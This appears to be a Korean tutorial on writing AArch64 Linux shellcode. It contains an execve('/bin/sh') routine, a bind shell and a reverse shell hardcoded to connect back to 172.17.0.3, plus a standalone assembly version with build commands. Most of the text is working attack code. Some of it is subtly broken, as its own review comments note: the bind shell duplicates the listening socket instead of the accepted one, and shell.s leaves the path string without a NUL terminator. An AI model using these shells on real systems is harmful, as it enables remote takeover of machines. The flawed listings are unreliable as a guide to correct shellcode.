AArch64 환경에서 어셈블리로 Shellcode를 작성해본다.

ARM syscalls

NR syscall name x8 x0 x1 x2
198 socket 0xc6 int int int
200 bind 0xc8 int struct sockaddr * int
201 listen 0xc9 int int  
202 accept 0xca int struct sockaddr * int *
203 connect 0xcb int struct sockaddr * int
221 execve 0xdd const char *filename const char *const *argv const char *const *envp
24 dup3 0x18 unsigned int oldfd unsigned int newfd int flags

Shellcode

// run_sh: execve("/bin/sh", NULL, NULL) issued as a raw AArch64 Linux syscall.
// Syscall ABI used here: number in x8, arguments in x0..x2, `svc 0` traps into
// the kernel and the result (or a negative errno) comes back in x0.
// On success the process image is replaced and this routine never returns; on
// failure the errno in x0 is not checked and, since there is no `ret`, execution
// simply continues into whatever the toolchain placed next in .text.
__asm__(
    ".global run_sh\n"
    "run_sh:\n"

    "mov x8, #221\n"                // x8 = __NR_execve (221)
    // NOTE(review): `ldr xN, =sym` stores an absolute 64-bit address in the
    // literal pool; in a PIE/shared build that needs a text relocation, whereas
    // adrp/add would be position independent -- confirm against the link flags.
    "ldr x0, =sh_string\n"          // x0 = &sh_string (PC-relative load from the literal pool)
    "mov x1, #0\n"                  // argv = NULL
    "mov x2, #0\n"                  // envp = NULL
    "svc 0\n"

    // NOTE(review): the assembler is left in .rodata after this block; a
    // trailing ".text\n" (or ".previous\n") would restore the section.
    ".section .rodata\n"
    "sh_string: .ascii \"/bin/sh\\0\""   // NUL-terminated path for execve
);

/* Defined by the inline assembly above; declared here so main() can call it. */
void run_sh(void);

/* Transfers control to run_sh(), which is not expected to return: it ends in an
 * execve syscall and has no `ret`. */
int main(void) {
    run_sh();
    return 0;
}

Bind Shellcode

#include <stdio.h>

// run_sh: bind-shell sequence issued as raw AArch64 Linux syscalls:
//   socket -> bind -> listen -> accept -> dup3 x3 -> execve("/bin/sh").
// Syscall ABI used here: number in x8, arguments in x0..x2, `svc 0` traps into
// the kernel and the result (or a negative errno) comes back in x0.
// No result is checked anywhere in this routine, so a failed call feeds its
// negative errno into the following call as if it were a descriptor.
__asm__(
    ".global run_sh\n"
    "run_sh:\n"

// socket(AF_INET = 2, SOCK_STREAM = 1, protocol 0)
    "mov x8, #0xc6\n"               // __NR_socket (198)
    "mov x0, #2\n"
    "mov x1, #1\n"
    "mov x2, #0\n"
    "svc 0\n"
    // NOTE(review): x19 is callee-saved under AAPCS64 and is neither saved nor
    // restored here; that is only tolerable because execve below never returns.
    "mov x19, x0\n"                 // x19 = listening socket fd for the rest of the routine

// bind(x19, &sockaddr, 16)
    "mov x8, #0xc8\n"               // __NR_bind (200)
    "mov x0, x19\n"
    "ldr x1, =sockaddr\n"           // address of the 16-byte sockaddr_in image in .rodata
    "mov x2, #16\n"                 // sizeof(struct sockaddr_in)
    "svc 0\n"

// listen(x19, 1)
    "mov x8, #0xc9\n"               // __NR_listen (201)
    "mov x0, x19\n"
    "mov x1, #1\n"                  // backlog
    "svc 0\n"

// accept(x19, NULL, NULL)
    "mov x8, #0xca\n"               // __NR_accept (202)
    "mov x0, x19\n"
    "mov x1, #0\n"                  // addr = NULL
    "mov x2, #0\n"                  // addrlen = NULL
    "svc 0\n"                       // accepted-connection fd is returned in x0

// dup3(x19, 0, 0)
    // NOTE(review): accept's return value in x0 is not preserved -- the next
    // instruction overwrites it -- so the three dup3 calls below operate on x19,
    // the listening socket.
    "mov x8, #0x18\n"               // __NR_dup3 (24)
    "mov x0, x19\n"
    "mov x1, #0\n"                  // newfd = stdin
    "mov x2, #0\n"                  // flags = 0
    "svc 0\n"

// dup3(x19, 1, 0)
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #1\n"                  // newfd = stdout
    "mov x2, #0\n"
    "svc 0\n"

// dup3(x19, 2, 0)
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #2\n"                  // newfd = stderr
    "mov x2, #0\n"
    "svc 0\n"

// execve("/bin/sh", NULL, NULL) -- does not return on success; no `ret` follows
    "mov x8, #0xdd\n"               // __NR_execve (221)
    "ldr x0, =sh_string\n"
    "mov x1, #0\n"                  // argv = NULL
    "mov x2, #0\n"                  // envp = NULL
    "svc 0\n"

    // NOTE(review): the assembler is left in .rodata after this block; a
    // trailing ".text\n" (or ".previous\n") would restore the section.
    ".section .rodata\n"
    // struct sockaddr_in image (16 bytes) consumed by bind above
    "sockaddr:\n"
    ".short 2\n"                    // sin_family = AF_INET
    ".short 0x8984\n"               // sin_port, emitted as a raw 16-bit value (expected already in network byte order)
    ".word 0\n"                     // sin_addr = INADDR_ANY
    ".space 8\n"                    // sin_zero padding
    "sh_string: .ascii \"/bin/sh\\0\""   // NUL-terminated path for execve
);

/* Defined by the inline assembly above; declared here so main() can call it. */
void run_sh(void);

/* Transfers control to run_sh(), which is not expected to return: it ends in an
 * execve syscall and has no `ret`. */
int main(void) {
    run_sh();
    return 0;
}

Reverse Shellcode

#include <stdio.h>

// run_sh: reverse-shell sequence issued as raw AArch64 Linux syscalls:
//   socket -> connect -> dup3 x3 -> execve("/bin/sh").
// Syscall ABI used here: number in x8, arguments in x0..x2, `svc 0` traps into
// the kernel and the result (or a negative errno) comes back in x0.
// No result is checked anywhere in this routine: if socket() or connect()
// fails, the later calls still run with whatever x19 / x0 hold.
__asm__(
    ".global run_sh\n"
    "run_sh:\n"

// socket(AF_INET = 2, SOCK_STREAM = 1, protocol 0)
    "mov x8, #0xc6\n"               // __NR_socket (198)
    "mov x0, #2\n"
    "mov x1, #1\n"
    "mov x2, #0\n"
    "svc 0\n"
    // NOTE(review): x19 is callee-saved under AAPCS64 and is neither saved nor
    // restored here; that is only tolerable because execve below never returns.
    "mov x19, x0\n"                 // x19 = socket fd for the rest of the routine

// connect(x19, &sockaddr, 16)
    "mov x8, #0xcb\n"               // __NR_connect (203)
    "mov x0, x19\n"
    "ldr x1, =sockaddr\n"           // address of the 16-byte sockaddr_in image in .rodata
    "mov x2, #16\n"                 // sizeof(struct sockaddr_in)
    "svc 0\n"                       // result ignored; a failed connect is not detected

// dup3(x19, 0, 0)
    "mov x8, #0x18\n"               // __NR_dup3 (24)
    "mov x0, x19\n"
    "mov x1, #0\n"                  // newfd = stdin
    "mov x2, #0\n"                  // flags = 0
    "svc 0\n"

// dup3(x19, 1, 0)
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #1\n"                  // newfd = stdout
    "mov x2, #0\n"
    "svc 0\n"

// dup3(x19, 2, 0)
    "mov x8, #0x18\n"
    "mov x0, x19\n"
    "mov x1, #2\n"                  // newfd = stderr
    "mov x2, #0\n"
    "svc 0\n"

// execve("/bin/sh", NULL, NULL) -- does not return on success; no `ret` follows
    "mov x8, #0xdd\n"               // __NR_execve (221)
    "ldr x0, =sh_string\n"
    "mov x1, #0\n"                  // argv = NULL
    "mov x2, #0\n"                  // envp = NULL
    "svc 0\n"

    // NOTE(review): the assembler is left in .rodata after this block; a
    // trailing ".text\n" (or ".previous\n") would restore the section.
    ".section .rodata\n"
    // struct sockaddr_in image (16 bytes) consumed by connect above
    "sockaddr:\n"
    ".short 2\n"                    // sin_family = AF_INET
    ".short 0x8984\n"               // sin_port, emitted as a raw 16-bit value (expected already in network byte order)
    ".word 0x030011ac\n"            // sin_addr, emitted as a raw 32-bit value (expected already in network byte order)
    ".space 8\n"                    // sin_zero padding
    "sh_string: .ascii \"/bin/sh\\0\""   // NUL-terminated path for execve
);

/* Defined by the inline assembly above; declared here so main() can call it. */
void run_sh(void);

/* Transfers control to run_sh(), which is not expected to return: it ends in an
 * execve syscall and has no `ret`. */
int main(void) {
    run_sh();
    return 0;
}

How to compile ARM assembly code without inline assembly code in C

shell.s

// _start: execve("/bin/sh", NULL, NULL) as a freestanding AArch64 Linux program.
// No C runtime is linked in, so the entry symbol is _start rather than main.
// Syscall ABI: number in x8, arguments in x0..x2, `svc 0` traps into the kernel.
// (GNU AArch64 assembler: `//` starts a comment; `;` is a statement separator.)
.global _start
_start:

mov x8, #221          // x8 = __NR_execve (221)
ldr x0, =sh_string    // x0 = &sh_string (PC-relative load from the literal pool)
mov x1, #0            // argv = NULL
mov x2, #0            // envp = NULL
svc 0                 // no exit or ret after this: if execve fails, execution continues into whatever follows in .text

.section .rodata
// NOTE(review): .ascii emits no terminating NUL (unlike the "/bin/sh\0" used in
// the inline-asm listings above, or .asciz); execve expects a NUL-terminated path.
sh_string: .ascii "/bin/sh"
# Assemble shell.s and link it on its own into a static binary (no libc is linked in).
as -o shell.o shell.s
ld -o shell shell.o
